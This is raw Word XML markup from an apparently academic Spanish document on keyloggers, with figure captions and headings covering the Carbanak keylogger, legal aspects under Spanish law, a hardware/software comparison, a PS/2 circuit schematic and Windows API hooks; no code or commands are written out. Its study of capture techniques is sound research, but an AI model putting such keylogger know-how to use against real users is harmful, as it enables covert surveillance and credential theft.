        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="004F31A6">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="004F31A6">
            <w:instrText xml:space="preserve"> CITATION ElM05 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="004F31A6">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="004B78F9">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="004B78F9">
            <w:instrText xml:space="preserve"> CITATION Per1 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="004B78F9">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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3D2B36B7" wp14:editId="3DDEE691">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9" w:name="_Toc19358144"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00AB2841">
        <w:t>. Muestra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de una sección del perfil de LinkedIn de Michael Haephrati. </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Detenido en 2005 por la creación de un keylogger.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00936397">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00936397">
            <w:instrText xml:space="preserve"> CITATION Hao \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00936397">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[17]</w:t>
          </w:r>
          <w:r w:rsidR="00936397">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> de la Universidad de California, Davis</w:t>
      </w:r>
      <w:r w:rsidR="00FB58DD">
        <w:t>, presentó un estudio</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-908455284"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00936397">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00936397">
            <w:instrText xml:space="preserve"> CITATION Hao11 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00936397">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="009B6106">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009B6106">
            <w:instrText xml:space="preserve"> CITATION Kas15 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="009B6106">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[19]</w:t>
          </w:r>
          <w:r w:rsidR="009B6106">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1964997879"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="009B6106">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009B6106">
            <w:instrText xml:space="preserve"> CITATION Kas151 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="009B6106">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[20]</w:t>
          </w:r>
          <w:r w:rsidR="009B6106">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1226190158"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="000D569E">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="000D569E">
            <w:instrText xml:space="preserve"> CITATION Alb19 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="000D569E">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[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2B402B95" wp14:editId="57D4C3FA">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40" w:name="_Toc19358145"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00547118">
        <w:t>Función de keylogger del malware Carbanak.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="0030185D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="0030185D">
            <w:instrText xml:space="preserve"> CITATION The15 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="0030185D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00305AD0">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00305AD0">
            <w:instrText xml:space="preserve"> CITATION Cat17 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00305AD0">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00A672DF">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00A672DF">
            <w:instrText xml:space="preserve"> CITATION Con17 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00A672DF">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[24]</w:t>
          </w:r>
          <w:r w:rsidR="00A672DF">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1537309379"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C50609">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C50609">
            <w:instrText xml:space="preserve">CITATION Syn17 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C50609">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00D227ED">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D227ED">
            <w:instrText xml:space="preserve"> CITATION Mic17 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D227ED">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00EC6F6A">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00EC6F6A">
            <w:instrText xml:space="preserve"> CITATION SUC17 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00EC6F6A">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00EC6F6A">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00EC6F6A">
            <w:instrText xml:space="preserve"> CITATION SUC18 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00EC6F6A">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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186F274A" wp14:editId="7B42F0B6">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1" w:name="_Toc19358146"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Código del keylogger inyec</w:t>
      </w:r>
      <w:r w:rsidR="007C5B01">
        <w:t>tado después de su descifrado</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>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562956" w:rsidRDefault="001147B3" w:rsidP="00562956">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc19810046"/>
      <w:r>
        <w:t>Estado del Arte</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>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w:t>
      </w:r>
      <w:r w:rsidR="001147B3">
        <w:t xml:space="preserve">en el malware, </w:t>
      </w:r>
      <w:r>
        <w:t>suelen forma</w:t>
      </w:r>
      <w:r w:rsidR="001147B3">
        <w:t xml:space="preserve">r parte de un </w:t>
      </w:r>
      <w:r w:rsidR="00B70E77">
        <w:t>troyano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserv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w:t>
      </w:r>
      <w:r w:rsidR="00B70E77">
        <w:t xml:space="preserve"> monitorización de aplicaciones,</w:t>
      </w:r>
      <w:r w:rsidR="00FC499C">
        <w:t xml:space="preserve"> y técnicas de cifrado y ocultación avanzadas, como veremos más adelante.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0045443C" w:rsidRDefault="0045443C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF3B89" w:rsidRDefault="00AF3B89" w:rsidP="00550235">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc18453494"/>
      <w:bookmarkStart w:id="44" w:name="_Toc19810047"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Aspectos Legales</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00AD7316">
            <w:rPr>
              <w:b/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00AD7316">
            <w:rPr>
              <w:b/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Dia13 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00AD7316">
            <w:rPr>
              <w:b/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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5219641C" wp14:editId="332278E3">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5" w:name="_Toc19358147"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">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45"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C148FB">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C148FB">
            <w:instrText xml:space="preserve"> CITATION Jef15 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C148FB">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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4C8479D3" wp14:editId="114279EF">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6" w:name="_Toc19358148"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Ejemplo de aviso legal sobre el uso del Keylogger, de un vendedor internacional.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>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End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DF019A" w:rsidRPr="00DF019A">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End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DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00F61D2C" w:rsidRPr="00513F70">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F61D2C" w:rsidRPr="00513F70">
            <w:instrText xml:space="preserve"> CITATION Min15 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F61D2C" w:rsidRPr="00513F70">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[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3E4C76FA" wp14:editId="167D34A8">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7" w:name="_Toc19358149"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve">Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Extracto del Artículo 20 del Estatuto de los Trabajadores.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00A31F05">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00A31F05">
            <w:instrText xml:space="preserve"> CITATION Min \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00A31F05">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[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C59D0B8" wp14:editId="7CA90BD1">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8" w:name="_Toc19358150"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Extracto del artículo 197 ter, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F0215D">
        <w:t>de la Ley Orgánica 1/2015, de 30 de marzo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>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9" w:name="_Toc18453495"/>
      <w:bookmarkStart w:id="50" w:name="_Toc19810048"/>
      <w:r w:rsidRPr="00853E9A">
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidRPr="00853E9A">
        <w:t>ipo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidR="00B02DDC">
        <w:t>logía</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>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51" w:name="_Toc19810125"/>
      <w:r>
        <w:t xml:space="preserve">Tabla </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Tabla \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Comparativa keyloggers Hardware y Software</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>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2" w:name="_Toc18453496"/>
      <w:bookmarkStart w:id="53" w:name="_Toc19810049"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Como captura los datos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="53"/>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4" w:name="_Toc18453497"/>
      <w:bookmarkStart w:id="55" w:name="_Toc19810050"/>
      <w:r>
        <w:t>Captura en keylogger basado en Hardware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="0013453C">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="0013453C">
            <w:instrText xml:space="preserve"> CITATION Kee \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="0013453C">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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C373D1E" wp14:editId="6E30B330">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6" w:name="_Toc19358151"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Esquema de circuito de keylogger básico usando la antigua conexión PS/2.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>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End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DF019A">
            <w:rPr>
              <w:noProof/>
              <w:lang w:eastAsia="hi-IN" w:bidi="hi-IN"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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7" w:name="_Toc18453498"/>
      <w:bookmarkStart w:id="58" w:name="_Toc19810051"/>
      <w:r>
        <w:t>Captura en keylogger basado en Software</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
      <w:bookmarkEnd w:id="58"/>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9" w:name="_Toc18453499"/>
      <w:bookmarkStart w:id="60" w:name="_Toc19810052"/>
      <w:r>
        <w:t>En una Máquina Virtual</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
      <w:bookmarkEnd w:id="60"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00EB3A23">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00EB3A23">
            <w:instrText xml:space="preserve"> CITATION Joa06 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00EB3A23">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[35]</w:t>
          </w:r>
          <w:r w:rsidR="00EB3A23">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-670871159"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00ED4781">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00ED4781">
            <w:instrText xml:space="preserve"> CITATION Kev06 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00ED4781">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00ED4781">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00ED4781">
            <w:instrText xml:space="preserve"> CITATION Joa061 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00ED4781">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[37]</w:t>
          </w:r>
          <w:r w:rsidR="00ED4781">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> del año 2006.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B27CC" w:rsidRDefault="002B27CC" w:rsidP="002B27CC">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc18453500"/>
      <w:bookmarkStart w:id="62" w:name="_Toc19810053"/>
      <w:r>
        <w:t>Basado en la API.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="62"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00DA3105">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00063373">
            <w:instrText xml:space="preserve">CITATION Mic18 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="00DA3105">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="002F2B32">
            <w:rPr>
              <w:b/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00063373">
            <w:rPr>
              <w:b/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION Mic181 \l 3082 </w:instrText>
          </w:r>
          <w:r w:rsidR="002F2B32">
            <w:rPr>
              <w:b/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00DF019A" w:rsidRPr="00DF019A">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5D572C0D" wp14:editId="7441D30C">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3" w:name="_Toc19358152"/>
      <w:r>
        <w:t xml:space="preserve">Ilustración </w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:instrText xml:space="preserve"> SEQ Ilustración \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E24312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="008400F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Esquema de funcionamiento del mecanismo de </w:t>
      </w:r>
      <w:r w:rsidRPr="00E06E39">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>hooks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en Windows.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>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EndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00C32884">
